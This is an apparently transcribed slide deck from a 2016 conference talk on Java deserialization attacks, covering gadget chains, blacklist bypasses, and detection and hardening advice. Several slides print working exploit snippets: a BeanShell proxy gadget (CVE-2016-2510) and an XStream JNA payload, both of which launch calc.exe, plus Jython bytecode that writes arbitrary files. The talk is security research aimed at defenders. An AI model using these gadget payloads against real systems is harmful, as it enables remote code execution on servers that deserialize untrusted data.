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Serial Killer: Silently Pwning Your Java Endpoints

Alvaro
March 22, 2016

Serial Killer: Silently Pwning Your Java Endpoints

Java systems need to exchange serialized data and objects. If attackers control data being deserialized, your applications may be in danger. This talk presents vulns found in libs from XStream, JBoss, Java and Apache, allowing attackers to run arbitrary code during deserialization (live demo). Key takeaways: how to find these nuggets in pentests and code reviews, and how to protect your apps.

Alvaro

March 22, 2016
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  1. Serial Killer: Silently Pwning Your Java Endpoints Chris;an Schneider Whitehat

    Hacker & Developer
 Freelancer
 @cschneider4711 Alvaro Muñoz Principal Security Researcher
 HPE Security For@fy
 @pwntester
  2. Why this talk? Java deserializa@on aEacks have been known for

    years Rela@vely new gadget in Apache Commons-Collec/ons made the topic also available to mainstream (dev) audience in 2015 Some inaccurate advice to protect your applica@ons is making the rounds In this talk we’ll demonstrate the weakness of this advice by … … showing you new RCE gadgets … showing you bypasses We’ll give advice how to spot this vulnerability and its gadgets during … … code reviews (i.e. showing you what to look for) … pentests (i.e. how to generically test for such issues) 2
  3. Standing on the Shoulder of Giants… 3 Spring AOP (by

    Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS (by Wouter Coekaerts in 2011) Commons-fileupload (by Arun Babu NeelicaEu in 2013) Groovy (by cpnrodzc7 / @frohoff in 2015) Commons-Collec;ons (by @frohoff and @gebl in 2015) Spring Beans (by @frohoff and @gebl in 2015) Serial DoS (by Wouter Coekaerts in 2015) SpringTx (by @zerothinking in 2016) JDK7 (by @frohoff in 2016) Probably more we are forge7ng and more to come in few minutes …
  4. What is Java Serializa;on again? Taking a snapshot of an

    object graph as a byte stream that can be used to reconstruct the object graph to its original state Only object data is serialized, not the code The code sits on the ClassPath of the (de)serializing end Developers can customize this serializa@on/deserializa@on process Individual object/state serializa@on 
 via .writeObject() / .writeReplace() / .writeExternal() methods Individual object/state re-construc@on on deserializing end
 via .readObject() / .readResolve() / .readExternal() methods (and more) 4
  5. AWack Surface Usages of Java serializa@on in protocols/formats/products: RMI (Remote

    Method Invoca@on) JMX (Java Management Extension) JMS (Java Messaging System) Spring Service Invokers HTTP, JMS, RMI, etc. … 5 Android AMF (Ac@on Message Format) JSF ViewState WebLogic T3 …
  6. Serializable Class Java Deserializa;on in a Nutshell 6 6. Restore

    object member fields • readObject(ObjectInputStream) • readObjectNoData() 7. Eventually replace restored object • readResolve() 8. Optionally validate object • validateObject() 9. Cast deserialized object to expected type 10.Use deserialized object ObjectInputStream Application Code Garbage Collector 11.Call finalize() on GC 1. Get bytes 2. Initialize ObjectInputStream 3. Read object from stream • ois.readObject() 4. Resolve classes of stream resolveClass() 5. Deserialize objects
  7. Triggering Execu;on via "Magic Methods" 7 Serializable Class 6. Restore

    object member fields • readObject(ObjectInputStream) • readObjectNoData() 7. Eventually replace restored object • readResolve() 8. Optionally validate object • validateObject() 9. Cast deserialized object to expected type 10.Use deserialized object ObjectInputStream Application Code Garbage Collector 11.Call finalize() on GC 1. Get bytes 2. Initialize ObjectInputStream 3. Read object from stream • ois.readObject() 4. Resolve classes of stream resolveClass() 5. Deserialize objects
  8. Exploi;ng "Magic Methods" Abusing "magic methods" of gadgets which have

    dangerous code: AEacker controls member fields’ values of serialized object Upon deserializa@on .readObject() / .readResolve() is invoked Implementa@on of this method in gadget class uses aWacker-controlled fields Aside from the classic ones also lesser-known "magic methods" help: .validateObject() as part of valida@on (which does not prevent aEacks) .readObjectNoData() upon deserializa@on conflicts .finalize() as part of GC (even ajer errors) with deferred execu@on bypassing ad-hoc SecurityManagers at deserializa@on Works also for Externalizable’s .readExternal() 8
  9. Exploi;ng "Magic Methods" But what if there are no 


    "Magic Methods" on the target’s ClassPath that have "dangerous code" for the aEacker to influence? 9
  10. Proxy with Invoca;onHandler as Catalyzer 10 Class field1 field2 …

    method1 method2 Interface method1 method2 Invocation Handler Custom code method2 Proxy
  11. AEacker steps upon serializa@on: AEacker controls member fields of IH

    gadget, which has dangerous code IH (as part of Dynamic Proxy) gets serialized by aEacker as field on which an innocuous method is called from "magic method" (of class to deserialize) Applica@on steps upon deserializa@on: "Magic Method" of "Trigger Gadget" calls innocuous method on an aWacker controlled field This call is intercepted by proxy (set by aEacker as this field) and dispatched to IH Other IH-like types exist aside from java.lang.reflect.Invoca@onHandler [email protected] org.jboss.weld.bean.proxy.MethodHandler Exploi;ng Invoca;onHandler (IH) Gadgets 11
  12. New RCE Gadget in BeanShell (CVE-2016-2510) bsh.XThis$Handler Serializable Invoca@onHandler Upon

    func@on intercep@on custom BeanShell code will be called Almost any Java code can be included in the payload In order to invoke the payload a trigger gadget is needed 12
  13. New RCE Gadget in BeanShell (CVE-2016-2510) 13 1 String payload

    = "compare(Object foo, Object bar) {" + 2 " new java.lang.ProcessBuilder(new String[]{\"calc.exe\"}).start();return 1;" + 3 "}"; 4 5 // Create Interpreter 6 Interpreter i = new Interpreter(); 7 i.eval(payload); 8 9 // Create Proxy/InvocationHandler 10 XThis xt = new XThis(i.getNameSpace(), i); 11 InvocationHandler handler = (InvocationHandler) getField(xt.getClass(), "invocationHandler").get(xt); 12 Comparator comparator = (Comparator) Proxy.newProxyInstance(classLoader, new Class<?>[]{Comparator.class}, handler); 13 14 // Prepare Trigger Gadget (will call Comparator.compare() during deserialization) 15 final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator); 16 Object[] queue = new Object[] {1,1}; 17 setFieldValue(priorityQueue, "queue", queue); 18 setFieldValue(priorityQueue, "size", 2);
  14. New RCE Gadget in Jython (CVE pending) org.python.core.PyFunction Serializable Invoca@onHandler

    Upon func@on intercep@on custom python bytecode will be called Only python built-in func@ons can be called Impor@ng modules is not possible: no os.system() sorry :( S@ll we can read and write arbitrary files (can cause RCE in web app) In order to invoke the payload a trigger gadget is needed 14
  15. New RCE Gadget in Jython (CVE pending) 15 1 //

    Python bytecode to write a file on disk 2 String code = 3 "740000" + // 0 LOAD_GLOBAL 0 (open) 4 "640100" + // 3 LOAD_CONST 1 (<PATH>) 5 "640200" + // 6 LOAD_CONST 2 ('w') 6 "830200" + // 9 CALL_FUNCTION 2 7 "690100" + // 12 LOAD_ATTR 1 (write) 8 "640300" + // 15 LOAD_CONST 3 (<CONTENT>) 9 "830100" + // 18 CALL_FUNCTION 1 10 "01" + // 21 POP_TOP 11 "640000" + // 22 LOAD_CONST 12 "53"; // 25 RETURN_VALUE 13 14 // Helping cons and names 15 PyObject[] consts = new PyObject[]{new PyString(""), new PyString(path), new PyString("w"), new PyString(content)}; 16 String[] names = new String[]{"open", “write"}; 17 18 PyBytecode codeobj = new PyBytecode(2, 2, 10, 64, "", consts, names, new String[]{}, "noname", "<module>", 0, ""); 19 setFieldValue(codeobj, "co_code", new BigInteger(code, 16).toByteArray()); 20 PyFunction handler = new PyFunction(new PyStringMap(), null, codeobj);
  16. New RCE Gadgets More of our reported RCE gadgets s;ll

    being fixed Stay tuned! TwiEer: @pwntester & @cschneider4711 Blog: hEps://hp.com/go/hpsrblog 16 ZDI ID Affected Vendor(s) Severity (CVSS) ZDI-CAN-3511 Oracle 7.5 ZDI-CAN-3510 Oracle 7.5 ZDI-CAN-3497 Oracle 7.5 ZDI-CAN-3588 Oracle 7.5 ZDI-CAN-3592 Oracle 7.5
  17. Exis;ng Mi;ga;on Advice 17 Simply remove gadget classes from ClassPath

    Blacklist & Whitelist based check at ObjectInputStream.resolveClass Different implementa@ons of this "Lookahead"-Deserializa@on exist: Use of ObjectInputStream subclass in applica@on’s deserializa@on code Agent-based (AOP-like) hooking of calls to ObjectInputStream.resolveClass() Ad hoc SecurityManager sandboxes during deserializa@on
  18. Exis;ng Mi;ga;on Advice 18 Simply remove gadget classes from ClassPath

    Not feasible given more and more gadgets becoming available Blacklist & Whitelist based check at ObjectInputStream.resolveClass Different implementa@ons of this "Lookahead"-Deserializa@on exist: Use of ObjectInputStream subclass in applica@on’s deserializa@on code Agent-based (AOP-like) hooking of calls to ObjectInputStream.resolveClass() Ad hoc SecurityManager sandboxes during deserializa@on
  19. Exis;ng Mi;ga;on Advice 19 Simply remove gadget classes from ClassPath

    Not feasible given more and more gadgets becoming available Blacklist & Whitelist based check at ObjectInputStream.resolveClass Different implementa@ons of this "Lookahead"-Deserializa@on exist: Use of ObjectInputStream subclass in applica@on’s deserializa@on code Agent-based (AOP-like) hooking of calls to ObjectInputStream.resolveClass() Blacklists: Bypasses might exist (in your dependencies or your own code) Whitelists: Difficult to get right & DoS though JDK standard classes possible Ad hoc SecurityManager sandboxes during deserializa@on
  20. Exis;ng Mi;ga;on Advice 20 Simply remove gadget classes from ClassPath

    Not feasible given more and more gadgets becoming available Blacklist & Whitelist based check at ObjectInputStream.resolveClass Different implementa@ons of this "Lookahead"-Deserializa@on exist: Use of ObjectInputStream subclass in applica@on’s deserializa@on code Agent-based (AOP-like) hooking of calls to ObjectInputStream.resolveClass() Blacklists: Bypasses might exist (in your dependencies or your own code) Whitelists: Difficult to get right & DoS though JDK standard classes possible Ad hoc SecurityManager sandboxes during deserializa@on Execu@on can be deferred a]er deserializa@on: we’ll show later how…
  21. How did vendors handle this recently? Vendor / Product Type

    of Protection Atlassian Bamboo Removed Usage of Serialization Apache ActiveMQ LAOIS Whitelist Apache Batchee LAOIS Blacklist + optional Whitelist Apache JCS LAOIS Blacklist + optional Whitelist Apache openjpa LAOIS Blacklist + optional Whitelist Apache Owb LAOIS Blacklist + optional Whitelist Apache TomEE LAOIS Blacklist + optional Whitelist ********** (still to be fixed) LAOIS Blacklist 21
  22. Bypassing LookAhead Blacklists New gadget type to bypass ad-hoc look-ahead

    ObjectInputStream blacklist protec@ons: Can we find a class like:
 During deserializa@on of the object graph, a new immaculate unprotected ObjectInputStream will be instan@ated AEacker can provide any arbitrary bytes for unsafe deserializa@on Bypass does not work for cases where ObjectInputStream is instrumented 22 1 public class NestedProblems implements Serializable { 2 byte[] bytes … ; 3 … 4 private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { 5 ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes)); 6 ois.readObject(); 7 } 8 }
  23. Is this for real or is this just fantasy? 


    Applica@on Servers: IBM WebSphere: 13 Oracle WebLogic: 3 Apache TomEE: 3 … 23 Currently we found many bypass gadgets: JRE: 3 Third Party Libraries: Apache libraries: 6 Spring libraries: 1 Other popular libraries: 2
  24. Example (has been fixed) org.apache.commons.scxml2.env.groovy.GroovyContext 24 1 @SuppressWarnings("unchecked") 2 private

    void readObject(ObjectInputStream in) throws IOException,ClassNotFoundException { 3 this.scriptBaseClass = (String)in.readObject(); 4 this.evaluator = (GroovyEvaluator)in.readObject(); 5 this.binding = (GroovyContextBinding)in.readObject(); 6 byte[] bytes = (byte[])in.readObject(); 7 if (evaluator != null) { 8 this.vars = (Map<String, Object>) 9 new ObjectInputStream(new ByteArrayInputStream(bytes)) { 10 protected Class resolveClass(ObjectStreamClass osc) throws IOException, ClassNotFoundException { 11 return Class.forName(osc.getName(), true, evaluator.getGroovyClassLoader()); 12 } 13 }.readObject(); 14 } 15 else { 16 this.vars = (Map<String, Object>)new ObjectInputStream(new ByteArrayInputStream(bytes)).readObject(); 17 } 18 }
  25. Now with home delivery javax.media.jai.remote.SerializableRenderedImage finalize() > dispose() > closeClient()

    Bypasses ad-hoc Security Managers 25 1 private void closeClient() { 2 3 // Connect to the data server. 4 Socket socket = connectToServer(); 5 6 // Get the socket output stream and wrap an object 7 // output stream around it. 8 OutputStream out = null; 9 ObjectOutputStream objectOut = null; 10 ObjectInputStream objectIn = null; 11 try { 12 out = socket.getOutputStream(); 13 objectOut = new ObjectOutputStream(out); 14 objectIn = new ObjectInputStream(socket.getInputStream()); 15 } catch (IOException e) { ... } 16 ... 18 try { 19 objectIn.readObject(); 20 } catch (IOException e) { 21 sendExceptionToListener(JaiI18N.getString( 22 "SerializableRenderedImage8"), 23 new ImagingException(JaiI18N.getString( 24 "SerializableRenderedImage8"), e)); 25 } catch (ClassNotFoundException cnfe) { 26 sendExceptionToListener(JaiI18N.getString( 27 "SerializableRenderedImage9"), 28 new ImagingException(JaiI18N.getString( 29 "SerializableRenderedImage9"), cnfe)); 30 } 31 ... 32 }
  26. Is it just Java Serializa;on? XStream is like Java Serializa@on

    on steroids Can deserialize non-serializable classes: —> many more gadgets available Reported back in 2013: CVE-2013-7285 by Alvaro Munoz (@pwntester) & Abraham Kang (@KangAbraham) XStream implemented a blacklist/whitelist protec@on scheme 
 (by default only blocking java.beans.EventHandler) Unfortunately devs are not fully aware and s@ll use unprotected or only blacklisted XStream instances e.g.: CVE-2015-5254 in Apache Ac;veMQ and CVE-2015-5344 in Apache Camel both by @pwntester, @cschneider4711, @maEhias_kaiser We found many new gadgets during research Can’t be fixed by making them non-serializable. Only fix is applying a whitelist to XStream instance. … plus most of the ones available for Java serializa@on (e.g.: Commons-Collec@ons, Spring, …) 27
  27. Exploi;ng JNA 28 1 <sorted-set> 2 <string>calc.exe</string> 3 <dynamic-proxy> 4

    <interface>java.lang.Comparable</interface> 5 <handler class="com.sun.jna.CallbackReference$NativeFunctionHandler"> 6 <options /> 7 <function class="com.sun.jna.Function"> 8 <peer>140735672090131</peer> <!-- depends on target --> 9 <library> 10 <libraryName>c</libraryName> 11 <libraryPath>libc.dylib</libraryPath> 12 </library> 13 <functionName>system</functionName> 14 </function> 15 </handler> 16 </dynamic-proxy> 17 </sorted-set>
  28. XStream, can you run readObject()? XStream works with Java serializa@on

    so that if a class contains a readObject() or readResolve() method, it will call them as part of the deserializa@on. XStream turns any XStream deserializa@on endpoint into a standard Java one Can we bypass XStream permission system by running code in readObject(), readResolve(), finalize(), … ? Any LookAhead bypass gadget will also be valid to bypass XStream blacklist 29
  29. Who Should Check for What? 1. Check your endpoints for

    those accep;ng (untrusted) 
 serialized data 2. Check your code for poten;al gadgets, which could be used in deserializa@on aEacks where your library / framework is used Also the ClassPath of the app-server can host exploitable gadgets Problem: "Gadget Space" is too big Typical app-server based deployments have hundreds of JARs in ClassPath SAST tools might help for both checks… Such as HPE Security For@fy or the OpenSource FindSecBugs 31
  30. Finding Direct Deserializa;on Endpoints Find calls (within your code and

    your dependencies’ code) to: ObjectInputStream.readObject() ObjectInputStream.readUnshared() Where InputStream is aEacker controlled. For example: … and ObjectInputStream is or extends java.io.ObjectInputStream … but is not a safe one (eg: Commons-io Valida@ngObjectInputStream) 32 1 InputStream is = request.getInputStream(); 2 ObjectInputStream ois = new ObjectInputStream(is); 3 ois.readObject();
  31. High-Level Gadget Categories 33 Gadget is a class (within target’s

    ClassPath) useable upon deserializa@on to facilitate an aEack, which ojen consists of mul@ple gadgets chained together as a "Gadget Chain". Trigger Gadget is a class with a "Magic Method" triggered during deserializa@on ac@ng upon proxy-able fields, which are aEacker controlled. Trigger Gadgets ini@ate the execu@on. Bypass Gadget is a class with (preferably) a "Magic Method" triggered during deserializa@on which leads to a "Nested Deserializa@on" with an unprotected OIS of aEacker-controllable bytes. Helper Gadget is a class with glues together other bonds of a gadget chain. Abuse Gadget is a class with a method implemen@ng dangerous func@onality, aEackers want to execute. Need for gadget serializability is liEed when techniques like XStream are used by the target.
  32. Finding Gadgets for Fun & Profit 34 Look for interes;ng

    method calls … java.lang.reflect.Method.invoke() java.io.File() java.io.ObjectInputStream() java.net.URLClassLoader() java.net.Socket() java.net.URL() javax.naming.Context.lookup() … reached by: java.io.Externalizable.readExternal() java.io.Serializable.readObject() java.io.Serializable.readObjectNoData() java.io.Serializable.readResolve() [email protected]() java.lang.refl[email protected]() [email protected]() org.jboss.weld.bean.proxy.MethodHandler.invoke() java.lang.Object.finalize() <clinit> (sta/c ini/alizer) .toString(), .hashCode() and .equals() Sinks Sources
  33. Passive Deserializa;on Endpoint Detec;on 36 Requests (or any network traffic)

    carrying serialized Java objects: Easy to spot due to magic bytes at the beginning: 0xAC 0xED … Some web-apps might use Base64 to store serialized data 
 in Cookies, etc.: rO0 … Be aware that compression could’ve been applied before Base64 Several Burp-Plugins have been created recently to passively scan 
 for Java serializa@on data as part of web traffic analysis Also test for non-web related (binary) traffic with network protocol analyzers
  34. Ac;ve Vulnerability Scanning 37 Some Burp-Plugins ac;vely try to exploit

    subset of exis@ng gadgets Either blind through OOB communica@on ("superserial-ac@ve") For applica@ons running on JBoss Or @me-based blind via delay ("Java Deserializa@on Scanner") For gadgets in Apache Commons Collec@ons 3 & 4 And gadgets in Spring 4 Recommenda@on: Adjust ac@ve scanning payloads to not rely on specific gadgets - beEer use a generic delay introduc@on Such as "SerialDoS" (by Wouter Coekaerts), which is only HashSet based
  35. How to Harden Your Applica;ons? DO NOT DESERIALIZE UNTRUSTED DATA!!

    When architecture permits it: Use other formats instead of serialized objects: JSON, XML, etc. But be aware of XML-based deserializa@on aEacks via XStream, XmlDecoder, etc. As second-best op@on: Use defensive deserializa@on with look-ahead OIS with a strict whitelist Don’t rely on gadget-blacklis@ng alone! You can build the whitelist with OpenSource agent SWAT (Serial Whitelist Applica@on Trainer) Prefer an agent-based instrumen@ng of ObjectInputStream towards LAOIS Scan your own whitelisted code for poten@al gadgets S@ll be aware of DoS scenarios If possible use a SecurityManager as defense-in-depth 39
  36. Apply What You Have Learned Today Next week you should:

    Iden@fy your cri@cal applica@ons’ exposure to untrusted data that gets deserialised SAST might help here if codebase is big For already reported vulnerable products, ensure to apply patches Configure applica@ons with whitelists where possible In the first three months following this presenta@on you should: If possible switch the deserializa@on to other formats (JSON, etc.), or Use defensive deserializa@on with a strict whitelist Within six months you should: Use DAST to ac@vely scan for deserializa@on vulnerabili@es as part of your process Apply SAST techniques to search for aEacker-helping gadgets Extend this analysis also to non-cri@cal applica@ons 40